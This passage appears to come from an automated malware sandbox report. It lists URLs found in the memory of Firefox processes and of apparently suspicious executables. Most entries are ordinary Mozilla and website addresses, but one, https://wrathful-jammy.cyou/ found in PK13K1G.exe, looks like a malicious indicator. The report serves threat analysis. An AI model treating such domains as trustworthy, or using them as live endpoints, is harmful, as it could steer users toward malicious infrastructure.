Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2662138541.000001324F38B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000036.00000003.2920812541.000002871C8C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3146367189.000002871C8C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpresource://devtools/
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFoundT
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeededTo
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2674215588.000001324F503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.org
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2878249720.0000028713FC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translationaccount-send-tab-to-device-singledevice-learnmore_
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.orgupgradeTabsProgressListenerdevice-connected-notificationmedia.autoplay.bl
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000017.00000002.2628867564.000001324B2E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2710270016.0000198D55400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000017.00000002.2622599068.0000013249326000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3158219440.00000287193D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631935554.000001324CBBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2814498844.00000287195E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2710270016.0000198D55400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000017.00000002.2620149903.00000132489AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3105754755.000000000BCB1000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3074070661.0000000001415000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000017.00000002.2622599068.0000013249326000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000017.00000002.2704916068.0000013255095000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000017.00000002.2704916068.0000013255095000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000017.00000002.2704916068.0000013255095000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: firefox.exe, 00000017.00000002.2620149903.00000132489AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3105754755.000000000BCB1000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3074070661.0000000001415000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000017.00000002.2704916068.0000013255095000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2814498844.00000287195E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000017.00000003.2603800946.0000013255114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2814308931.0000028719871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631765675.000001324CA70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/XPIProvider
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 00000017.00000002.2622599068.0000013249326000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2646663636.000001324D64F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search_setupTextboxEventListeners/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2610836806.000000297C8FC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620813706.0000013248AF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2709501209.00000A4652E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3152852196.00000287197DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/startQuery/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248954000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3062381996.0000000000884000.00000040.00000001.01000000.00000012.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 00000017.00000002.2610836806.000000297C8FC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000017.00000002.2674958419.0000013250257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2711239284.000029C74B200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
